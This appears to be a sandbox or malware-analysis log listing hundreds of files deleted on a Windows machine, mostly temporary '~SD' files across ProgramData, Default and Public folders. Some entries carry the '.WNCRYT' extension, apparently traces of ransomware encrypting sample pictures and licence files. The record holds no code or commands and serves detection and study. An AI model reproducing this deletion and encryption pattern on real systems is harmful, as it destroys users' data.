DeletedFile: C:\Users\All Users\chocolatey\lib\tapwindows\tools\~SD8966.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\~SD8976.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\~SD89A6.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2005\~SD89B7.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\~SD89C7.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2008\~SD89C8.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\~SD89E9.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2015\~SD8A28.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\~SD8A96.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\~SD8AD6.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\~SD8B44.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\adobereader\~SD8BA3.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\~SD8BE3.tmp
DeletedFile: C:\Users\All Users\chocolatey\logs\~SD8C41.tmp
DeletedFile: C:\Users\All Users\chocolatey\redirects\~SD8C90.tmp
DeletedFile: C:\Users\All Users\chocolatey\tools\~SD8D4D.tmp
DeletedFile: C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\~SD8E19.tmp
DeletedFile: C:\Users\All Users\Microsoft\Assistance\~SD8EA7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Assistance\Client\~SD8EB7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Assistance\Client\1.0\~SD8EF7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\~SD8F17.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\~SD8F47.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\~SD8F48.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\~SD8F49.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\~SD8F4A.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\~SD8F4B.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\~SD8F5C.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\~SD8F6C.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\~SD8F8C.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\~SD8FDC.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\~SD902B.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\~SD90E7.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\~SD9117.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\UserData\~SD9147.tmp
DeletedFile: C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\~SD9186.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\~SD91B6.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\DSS\~SD91B7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\~SD91B8.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\Keys\~SD91B9.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\PCPKSP\~SD91BA.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\~SD91BB.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\RSA\~SD91BC.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\~SD91BD.tmp
DeletedFile: C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\~SD91CE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\~SD91CF.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\~SD91D0.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\~SD91D1.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\~SD91D2.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Task\~SD91D3.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\~SD91D4.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\~SD91F4.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\~SD9272.tmp
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\~SD92B2.tmp
DeletedFile: C:\Users\All Users\Microsoft\DeviceSync\~SD92D2.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\~SD9302.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\~SD9341.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\~SD93B0.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\~SD93FF.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\~SD943E.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\~SD945F.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\~SD94AE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\~SD951C.tmp
DeletedFile: C:\Users\All Users\Microsoft\Diagnosis\Sideload\~SD955C.tmp
DeletedFile: C:\Users\All Users\Microsoft\DRM\~SD958B.tmp
DeletedFile: C:\Users\All Users\Microsoft\DRM\Server\~SD95DB.tmp
DeletedFile: C:\Users\All Users\Microsoft\EdgeUpdate\~SD962A.tmp
DeletedFile: C:\Users\All Users\Microsoft\EdgeUpdate\Log\~SD9669.tmp
DeletedFile: C:\Users\All Users\Microsoft\eHome\~SD9689.tmp
DeletedFile: C:\Users\All Users\Microsoft\eHome\logs\~SD96E8.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\~SD9737.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\~SD9767.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\~SD9797.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\~SD97D7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\~SD9835.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\Views\~SD9884.tmp
DeletedFile: C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\~SD98F3.tmp
DeletedFile: C:\Users\All Users\Microsoft\IdentityCRL\~SD9913.tmp
DeletedFile: C:\Users\All Users\Microsoft\Media Player\~SD9924.tmp
DeletedFile: C:\Users\All Users\Microsoft\MF\~SD9925.tmp
DeletedFile: C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
DeletedFile: C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
DeletedFile: C:\Users\All Users\Microsoft\NetFramework\~SD9976.tmp
DeletedFile: C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\~SD99E4.tmp
DeletedFile: C:\Users\All Users\Microsoft\Network\~SD9AC0.tmp
DeletedFile: C:\Users\All Users\Microsoft\Network\Connections\~SD9B0F.tmp
DeletedFile: C:\Users\All Users\Microsoft\Network\Downloader\~SD9B3F.tmp
DeletedFile: C:\Users\All Users\Microsoft\Office\~SD9B6F.tmp
DeletedFile: C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\~SD9BED.tmp
DeletedFile: C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\~SD9C6B.tmp
DeletedFile: C:\Users\All Users\Microsoft\RAC\~SD9CCA.tmp
DeletedFile: C:\Users\All Users\Microsoft\RAC\Outbound\~SD9D19.tmp
DeletedFile: C:\Users\All Users\Microsoft\RAC\PublishedData\~SD9D39.tmp
DeletedFile: C:\Users\All Users\Microsoft\RAC\StateData\~SD9DA7.tmp
DeletedFile: C:\Users\All Users\Microsoft\RAC\Temp\~SD9DF6.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\~SD9E26.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\~SD9E66.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\~SD9EC5.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\~SD9EC6.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\~SD9ED6.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\~SD9ED7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\~SD9ED8.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\~SD9ED9.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\~SD9EDA.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\~SD9EDB.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\~SD9EDC.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\~SD9EFC.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\~SD9EFD.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Temp\~SD9EFE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\~SD9F0F.tmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\~SD9F10.tmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\~SD9F11.tmp
DeletedFile: C:\Users\All Users\Microsoft\Vault\~SD9F12.tmp
DeletedFile: C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\~SD9F13.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\~SD9F24.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\AIT\~SD9F25.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\~SD9F26.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\~SD9F27.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\~SD9F28.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\DRM\~SD9F58.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\DRM\Cache\~SD9F97.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\GameExplorer\~SD9FE6.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\~SDA035.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\~SDA0C3.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Sqm\~SDA1BE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\~SDA1DE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\~SDA21E.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Sqm\Upload\~SDA22E.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\~SDA22F.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SDA230.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDA260.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SDA2BF.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDA2FE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDA33E.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SDA35E.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SDA3AD.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDA3DD.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\~SDA3FD.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\~SDA3FE.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SDA40F.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SDA420.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDA421.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\~SDA422.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\~SDA432.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\~SDA433.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\~SDA445.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Templates\~SDA456.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\WER\~SDA4A5.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\~SDA4F4.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\~SDA543.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\~SDA563.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\~SDA583.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\~SDA584.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\~SDA585.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\~SDA586.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\~SDA587.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Quarantine\~SDA588.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\~SDA5B8.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\~SDA694.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\~SDA6F3.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\~SDA742.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\~SDA791.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\~SDA7D1.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\~SDA7D2.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Support\~SDA7E2.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\~SDA7E3.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\~SDA7E4.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\~SDA7E5.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\~SDA7E6.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\~SDA7E7.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\~SDA7F8.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\~SDA7F9.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\~SDA7FA.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\~SDA7FB.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\~SDA7FC.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSScan\~SDA7FD.tmp
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\WwanSvc\~SDA83C.tmp
DeletedFile: C:\Users\All Users\Microsoft OneDrive\~SDA83E.tmp
DeletedFile: C:\Users\All Users\Microsoft OneDrive\setup\~SDA83F.tmp
DeletedFile: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\~SDA8CD.tmp
DeletedFile: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\~SDA8FD.tmp
DeletedFile: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\~SDA95C.tmp
DeletedFile: C:\Users\All Users\Oracle\~SDA9AB.tmp
DeletedFile: C:\Users\All Users\Oracle\Java\~SDA9FA.tmp
DeletedFile: C:\Users\All Users\Oracle\Java\installcache\~SDAA2A.tmp
DeletedFile: C:\Users\All Users\Oracle\Java\installcache_x64\~SDAA88.tmp
DeletedFile: C:\Users\All Users\Package Cache\~SDAC7D.tmp
DeletedFile: C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\~SDAD1B.tmp
DeletedFile: C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\~SDAD1C.tmp
DeletedFile: C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\~SDAD1D.tmp
DeletedFile: C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\~SDAD1E.tmp
DeletedFile: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\~SDAD3E.tmp
DeletedFile: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\~SDAD8D.tmp
DeletedFile: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\~SDADEC.tmp
DeletedFile: C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\~SDAE99.tmp
DeletedFile: C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\~SDAF07.tmp
DeletedFile: C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\~SDAF47.tmp
DeletedFile: C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\~SDAF96.tmp
DeletedFile: C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\~SDAFE5.tmp
DeletedFile: C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\~SDB024.tmp
DeletedFile: C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\~SDB054.tmp
DeletedFile: C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\~SDB074.tmp
DeletedFile: C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\~SDB0C4.tmp
DeletedFile: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\~SDB113.tmp
DeletedFile: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\~SDB162.tmp
DeletedFile: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\~SDB1A1.tmp
DeletedFile: C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\~SDB200.tmp
DeletedFile: C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\~SDB24F.tmp
DeletedFile: C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\~SDB26F.tmp
DeletedFile: C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\~SDB2FD.tmp
DeletedFile: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\~SDB32D.tmp
DeletedFile: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\~SDB34D.tmp
DeletedFile: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\~SDB36D.tmp
DeletedFile: C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\~SDB3CC.tmp
DeletedFile: C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\~SDB40C.tmp
DeletedFile: C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\~SDB42C.tmp
DeletedFile: C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\~SDB46B.tmp
DeletedFile: C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\~SDB4AB.tmp
DeletedFile: C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\~SDB4CB.tmp
DeletedFile: C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\~SDB50B.tmp
DeletedFile: C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\~SDB53B.tmp
DeletedFile: C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\~SDB58A.tmp
DeletedFile: C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\~SDB5BA.tmp
DeletedFile: C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\~SDB5DA.tmp
DeletedFile: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\~SDB639.tmp
DeletedFile: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\~SDB659.tmp
DeletedFile: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\~SDB689.tmp
DeletedFile: C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\~SDB6C8.tmp
DeletedFile: C:\Users\All Users\regid.1991-06.com.microsoft\~SDB727.tmp
DeletedFile: C:\Users\All Users\shimgen\~SDB795.tmp
DeletedFile: C:\Users\All Users\shimgen\generatedfiles\~SDB7D5.tmp
DeletedFile: C:\Users\Default\~SDB7F5.tmp
DeletedFile: C:\Users\Default\AppData\~SDB825.tmp
DeletedFile: C:\Users\Default\AppData\Local\~SDB836.tmp
DeletedFile: C:\Users\Default\AppData\Local\Microsoft\~SDB865.tmp
DeletedFile: C:\Users\Default\AppData\Local\Microsoft\Windows\~SDB8A5.tmp
DeletedFile: C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\~SDB8E4.tmp
DeletedFile: C:\Users\Default\AppData\Local\Microsoft\Windows\History\~SDB905.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\~SDB915.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Media Center Programs\~SDB955.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\~SDB985.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\~SDB9A5.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SDB9D5.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\~SDBA14.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SDBA64.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SDBA94.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\~SDBAB5.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\~SDBAE4.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SDBB14.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SDBB54.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SDBBD2.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDBBF2.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDBC22.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDBC52.tmp
DeletedFile: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\~SDBC53.tmp
DeletedFile: C:\Users\Default\Desktop\~SDBC54.tmp
DeletedFile: C:\Users\Default\Documents\~SDBC55.tmp
DeletedFile: C:\Users\Default\Downloads\~SDBC56.tmp
DeletedFile: C:\Users\Default\Favorites\~SDBC57.tmp
DeletedFile: C:\Users\Default\Links\~SDBC58.tmp
DeletedFile: C:\Users\Default\Music\~SDBC59.tmp
DeletedFile: C:\Users\Default\Pictures\~SDBC5A.tmp
DeletedFile: C:\Users\Default\Saved Games\~SDBC6A.tmp
DeletedFile: C:\Users\Default\Videos\~SDBC6B.tmp
DeletedFile: C:\Users\Public\~SDBC6C.tmp
DeletedFile: C:\Users\Public\Desktop\~SDBC6D.tmp
DeletedFile: C:\Users\Public\Documents\~SDBC6E.tmp
DeletedFile: C:\Users\Public\Downloads\~SDBCCD.tmp
DeletedFile: C:\Users\Public\Favorites\~SDBCFD.tmp
DeletedFile: C:\Users\Public\Libraries\~SDBD1D.tmp
DeletedFile: C:\Users\Public\Music\~SDBD5D.tmp
DeletedFile: C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
DeletedFile: C:\Users\Public\Pictures\~SDBE1A.tmp
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
DeletedFile: C:\Users\Public\Recorded TV\~SDC05E.tmp
DeletedFile: C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
DeletedFile: C:\Users\Public\Videos\~SDC0DD.tmp
DeletedFile: C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
